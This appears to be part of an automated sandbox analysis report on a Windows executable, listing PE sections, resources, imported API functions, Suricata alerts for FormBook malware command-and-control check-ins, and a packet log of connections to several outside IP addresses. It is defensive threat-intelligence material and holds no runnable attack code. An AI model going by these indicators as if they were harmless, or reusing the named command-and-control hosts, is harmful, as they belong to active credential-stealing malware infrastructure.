                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xc70000x554b80x556003671102e91effd249fe5170d53a0c326False0.9741661328696926data7.968509271564918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x11d0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xc77d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishGreat Britain0.4521276595744681
                                                                            RT_MENU0xc7c380x50dataEnglishGreat Britain0.9
                                                                            RT_STRING0xc7c880x594dataEnglishGreat Britain0.3333333333333333
                                                                            RT_STRING0xc821c0x68adataEnglishGreat Britain0.2747909199522103
                                                                            RT_STRING0xc88a80x490dataEnglishGreat Britain0.3715753424657534
                                                                            RT_STRING0xc8d380x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xc93340x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xc99900x466dataEnglishGreat Britain0.3605683836589698
                                                                            RT_STRING0xc9df80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                            RT_RCDATA0xc9f500x5204bdata1.0003304092609846
                                                                            RT_GROUP_ICON0x11bf9c0x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x11bfb00x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x11bfc40x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x11bfd80x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x11bfec0xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x11c0c80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                            DLLImport
                                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                            DescriptionData
                                                                            Translation0x0809 0x04b0

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain

                                                                            Network Behavior

                                                                            Download Network PCAP: filteredfull

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-03-28T14:34:29.143161+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224916176.223.54.14680TCP
                                                                            2025-03-28T14:34:44.481409+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249163199.59.243.22880TCP
                                                                            2025-03-28T14:34:47.134993+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249164199.59.243.22880TCP
                                                                            2025-03-28T14:34:49.779989+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249165199.59.243.22880TCP
                                                                            2025-03-28T14:34:52.415151+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249166199.59.243.22880TCP
                                                                            2025-03-28T14:34:57.748698+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249167104.21.94.16280TCP
                                                                            2025-03-28T14:35:00.698441+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249168104.21.94.16280TCP
                                                                            2025-03-28T14:35:03.163808+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249169104.21.94.16280TCP
                                                                            2025-03-28T14:35:06.169577+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249170104.21.94.16280TCP
                                                                            2025-03-28T14:35:11.531265+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917176.223.54.14680TCP
                                                                            2025-03-28T14:35:14.210408+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917276.223.54.14680TCP
                                                                            2025-03-28T14:35:16.849195+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917376.223.54.14680TCP
                                                                            2025-03-28T14:35:28.552724+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224917476.223.54.14680TCP
                                                                            2025-03-28T14:35:33.908477+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249175104.26.0.17780TCP
                                                                            2025-03-28T14:35:36.802944+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249176104.26.0.17780TCP
                                                                            2025-03-28T14:35:39.541370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249177104.26.0.17780TCP
                                                                            2025-03-28T14:35:42.174753+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249178104.26.0.17780TCP
                                                                            2025-03-28T14:35:47.669116+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249179162.254.38.21780TCP
                                                                            2025-03-28T14:35:50.483604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249180162.254.38.21780TCP
                                                                            2025-03-28T14:35:53.178570+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249181162.254.38.21780TCP
                                                                            2025-03-28T14:35:55.898526+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249182162.254.38.21780TCP

                                                                            Network Port Distribution

                                                                            • Total Packets: 496
                                                                            • 80 (HTTP)
                                                                            • 53 (DNS)
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 28, 2025 14:34:28.930020094 CET4916180192.168.2.2276.223.54.146
                                                                            Mar 28, 2025 14:34:29.026638031 CET804916176.223.54.146192.168.2.22
                                                                            Mar 28, 2025 14:34:29.026755095 CET4916180192.168.2.2276.223.54.146
                                                                            Mar 28, 2025 14:34:29.043905973 CET4916180192.168.2.2276.223.54.146
                                                                            Mar 28, 2025 14:34:29.142996073 CET804916176.223.54.146192.168.2.22
                                                                            Mar 28, 2025 14:34:29.143014908 CET804916176.223.54.146192.168.2.22
                                                                            Mar 28, 2025 14:34:29.143161058 CET4916180192.168.2.2276.223.54.146
                                                                            Mar 28, 2025 14:34:29.146622896 CET4916180192.168.2.2276.223.54.146
                                                                            Mar 28, 2025 14:34:29.242842913 CET804916176.223.54.146192.168.2.22
                                                                            Mar 28, 2025 14:34:34.661402941 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:34.787909985 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.790688038 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:34.854635954 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:34.980595112 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980621099 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980628967 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980638027 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980705976 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:34.980721951 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980731010 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980740070 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980756998 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980763912 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980773926 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980781078 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:34.980820894 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:34.980880022 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.106512070 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106523991 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106529951 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106544971 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106554985 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106560946 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106569052 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106581926 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106637001 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.106637001 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.106731892 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106739044 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106744051 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106750011 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106755972 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106761932 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106770039 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106780052 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106784105 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106786013 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.106800079 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106810093 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106812000 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.106817961 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.106837034 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.106854916 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.167264938 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232655048 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232671022 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232676983 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232682943 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232691050 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232697964 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232705116 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232712984 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232727051 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232732058 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232738972 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232738972 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232747078 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232754946 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232764006 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232764959 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232773066 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232779026 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232784033 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232789040 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232790947 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232798100 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232805014 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232816935 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232824087 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232831001 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232831001 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232837915 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232844114 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232844114 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232851982 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232857943 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232857943 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232867002 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232875109 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232877970 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232882977 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232889891 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232896090 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232899904 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232902050 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232909918 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232917070 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232923031 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232927084 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232930899 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232938051 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232949018 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232954025 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.232956886 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232974052 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.232974052 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.233004093 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.233004093 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.233086109 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359124899 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359136105 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359142065 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359148979 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359162092 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359169006 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359206915 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359206915 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359263897 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359271049 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359277964 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359288931 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359296083 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359301090 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359304905 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359308958 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359316111 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359323025 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359330893 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359338045 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359338045 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359344959 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359349012 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359353065 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359385967 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359385967 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359385967 CET4916280192.168.2.2245.33.6.223
                                                                            Mar 28, 2025 14:34:35.359406948 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359416008 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359420061 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359431028 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359436989 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359442949 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359448910 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359453917 CET804916245.33.6.223192.168.2.22
                                                                            Mar 28, 2025 14:34:35.359455109 CET4916280192.168.2.2245.33.6.223
